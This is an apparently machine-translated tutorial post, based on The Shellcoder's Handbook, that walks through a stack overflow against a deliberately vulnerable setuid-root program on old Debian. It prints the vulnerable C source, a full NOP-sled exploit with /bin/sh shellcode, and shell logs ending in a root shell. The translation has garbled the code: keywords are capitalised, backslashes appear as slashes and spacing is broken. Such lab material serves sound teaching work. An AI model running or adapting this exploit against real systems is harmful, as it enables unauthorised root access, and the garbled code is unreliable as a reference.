Shellcode 2. Plus: victim vulnerability elevation instance

 

Statement: The main content is from The Shellcoder's Handbook, which extracts Important Notes and adds some personal understanding. If there is something wrong, be sure to point it out.

 

A simple program victim attack is mentioned in <brief vulnerability elevation>. Since my system was Debian/Etch, I intentionally changed the stack address and failed to perform this test according to the book. After installing sarge, we started this experiment because this attack instance is very helpful for understanding stack overflow.

Note: There are very few sources of sources. list in sarge. At least I cannot find them. I use a DVD source. DVD: http://cdimage.debian.org/cdimage/archive/3.1_r8/i386/iso-dvd/

 

After the disc is inserted, run the following command to establish the compiling environment and activate the telnet and nfs services.

Apt-cdrom add

Apt-get update

Apt-get install build-essential

Apt-get install telnetd nfs-kernel-server nfs-common

Find esp

Write find_esp.c for output program stack address.

 

Sep @ debian :~ $ Cd shellcode/

Sep @ debian :~ /Shellcode $ ls

Exploit_victim find_esp hellworld shellcode victim

Exploit_victim.c find_esp.c hellworld. c shellcode. c victim. c

Sep @ debian :~ /Shellcode $ cat find_esp.c

// File: find_esp.c

 

# Include <stdio. h>

 

Unsigned long find_esp ()

{

_ Asm _ ("movl % esp, % eax ");

}

 

Int main ()

{

Printf ("0x % x/n", find_esp ());

}

 

Sep @ debian :~ /Shellcode $./find_esp

0xbffffb58

Sep @ debian :~ /Shellcode $./find_esp

0xbffffb58

Sep @ debian :~ /Shellcode $./find_esp

0xbffffb58

Sep @ debian :~ /Shellcode $

 

We can see that all three times of running find_esp return the same address value.

Victim vulnerability www.2cto.com

 

Sep @ debian :~ /Shellcode $ cat victim. c

// File: victim. c

 

# Include <stdio. h>

 

Int main (int argc, char * argv [])

{

Char little_arr [512];

If (argc> 1)

Strcpy (little_arr, argv [1]);

}

 

Sep @ debian :~ /Shellcode $ ls-l victim

-Rwsr-sr-x 1 root sep 11395 2010-08-12 victim

Sep @ debian :~ /Shellcode $

 

Note the strcpy in victim. c. After the program obtains the input from the command line, it copies the input data to the array without performing a boundary check, which facilitates stack overflow. Note: The owner of the Target Program victim has been set as root, and the suid bit is opened. After the attack is completed, we will have the root privilege.

Write overflow attack programs

The most difficult problem we have mentioned before is to find the starting address of shellcode, which can only be guessed Based on the esp address. We use the NOP method to write an EXP, as shown below:

 

// File: exploit_victim.c

 

# Include <stdio. h>

 

# Define DEFAULT_BUFFER_SIZE 512 // default buffer size, consistent with the victim. c buffer size

# Define NOP 0x90 // null Operation Command OP code

# Define NO_DEBUG

 

# Ifdef NO_DEBUG

# Define DPRINTF (,...)

# Else

# Define DPRINTF printf

# Endif

 

Char shellcode [] = "/xeb/x1a/x5e/x31"

"/Xc0/x88/x46/x07"

"/X8d/x1e/x89/x5e"

"/X08/x89/x46/x0c"

"/Xb0/x0b/x89/xf3"

"/X8d/x4e/x08/x8d"

"/X56/x0c/xcd/x80"

"/Xe8/xe1/xff"

"/Xff/x2f/x62/x69"

"/X6e/x2f/x73/x68 ";

 

// In sarge, the stack of each program starts with the same address. Based on this address, we can guess the starting address of shellcode.

Unsigned long find_esp ()

{

_ Asm _ ("movl % esp, % eax ");

}

 

Void main (int argc, char * argv [])

{

Char * buff, * ptr;

Long * paddr, addr;

Int bsize = DEFAULT_BUFFER_SIZE;

Int I;

If (argc> 1) bsize = atoi (argv [1]);

If (bsize <strlen (shellcode )){

Printf ("Buffer size is too small./n ");

Exit (1 );

}

If (! (Buff = malloc (bsize ))){

Printf ("Can't allocate memory./n ");

Exit (1 );

}

Addr = find_esp ();

Printf ("Using address: 0x % 08x/n", addr );

Ptr = buff;

DPRINTF ("/n ");

DPRINTF ("Fill buff with NOP:/n ");

For (I = 0; I <(bsize/2-strlen (shellcode)/2); I ++ ){

* (Ptr ++) = NOP;

If (I % 0x10) = 0) DPRINTF ("/n ");

DPRINTF ("% 02x", * (long *) (ptr-1 ));

}

DPRINTF ("/n ");

DPRINTF ("Fill buff with shellcode:/n ");

For (I = 0; I <strlen (shellcode); I ++ ){

* (Ptr ++) = shellcode [I];

If (I % 0x10) = 0) DPRINTF ("/n ");

DPRINTF ("% 02x", * (long *) (ptr-1 ));

}

DPRINTF ("/n ");

DPRINTF ("Fill buff with ret address:/n ");

For (I = 0; ptr <& buff [bsize-1]; ptr + = 4, I ++ ){

* (Long *) ptr = addr;

If (I % 0x8) = 0) DPRINTF ("/n ");

DPRINTF ("% 08x", * (long *) ptr );

}

DPRINTF ("/n ");

Buff [bsize-1] = '/0 ';

Memcpy (buff, "BUF =", 4 );

Putenv (buff );

System ("/bin/bash ");

}

 

Test results:

 

Sep @ debian :~ /Shellcode $ gcc-o exploit_victim exploit_victim.c

Exploit_victim.c: In function 'main ':

Exploit_victim.c: 45: warning: assignment makes pointer from integer without a cast

Exploit_victim.c: 33: warning: return type of 'main' is not 'int'

Sep @ debian :~ /Shellcode $./exploit_victim

Using address: 0xbffffb18

Sep @ debian :~ /Shellcode $./victim $ BUF

Sep @ debian :~ /Shellcode $./exploit_victim 520

Using address: 0xbffff928

Sep @ debian :~ /Shellcode $./victim $ BUF

Sep @ debian :~ /Shellcode $./exploit_victim 530

Using address: 0xbffff928

Sep @ debian :~ /Shellcode $./victim $ BUF

Segmentation fault

Sep @ debian :~ /Shellcode $./exploit_victim 540

Using address: 0xbffff918

Sep @ debian :~ /Shellcode $./victim $ BUF

Segmentation fault

Sep @ debian :~ /Shellcode $./exploit_victim 550

Using address: 0xbffff908

Sep @ debian :~ /Shellcode $./victim $ BUF

Segmentation fault

Sep @ debian :~ /Shellcode $./exploit_victim 560

Using address: 0xbffff908

Sep @ debian :~ /Shellcode $./victim $ BUF

Sh-2.05b # id

Uid = 1000 (sep) gid = 1000 (sep) euid = 0 (root) groups = 1000 (sep), 20 (dialout), 24 (cdrom), 25 (floppy ), 29 (audio), 44 (video), 46 (plugdev)

Sh-2.05b # exit

Exit

Sep @ debian :~ /Shellcode $./exploit_victim 600

Using address: 0xbffff8f8

Sep @ debian :~ /Shellcode $./victim $ BUF

Sh-2.05b #

Sh-2.05b # exit

Exit

Sep @ debian :~ /Shellcode $

 

After trying multiple addresses, you will be given the root privilege.

 

From AZURE